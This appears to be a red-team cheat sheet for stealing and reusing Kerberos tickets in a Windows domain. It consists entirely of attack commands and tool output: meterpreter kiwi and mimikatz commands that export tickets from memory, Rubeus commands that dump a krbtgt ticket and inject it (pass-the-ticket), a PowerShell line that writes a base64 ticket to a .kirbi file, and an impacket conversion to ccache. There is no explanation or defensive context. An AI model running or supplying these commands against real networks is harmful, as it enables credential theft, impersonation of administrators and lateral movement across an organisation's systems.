meterpreter > kiwi_cmd kerberos::list
meterpreter > kerberos_ticket_list
meterpreter > kiwi_cmd kerberos::list /export
C:\> Rubeus.exe triage
C:\> Rubeus.exe dump /service:krbtgt /luid:0x263ab /nowrap
C:\> Rubeus.exe ptt /ticket:[...base64-ticket...]
mimikatz # privilege::debug
mimikatz # sekurlsa::tickets /export
mimikatz # kerberos::ptt admin@krbtgt-vulnableone-local.kirbi
[System.IO.File]::WriteALLBytes("C:\Users\Redop\Desktop\admin.kirbi", [System.Convert]::FromBase64String("base64 ticket strings"))
└─$ impacket-ticketConverter admin.kirbi admin.ccache
Impacket v0.11.0 - Copyright 2023 Fortra
[*] converting kirbi to ccache...
[+] done
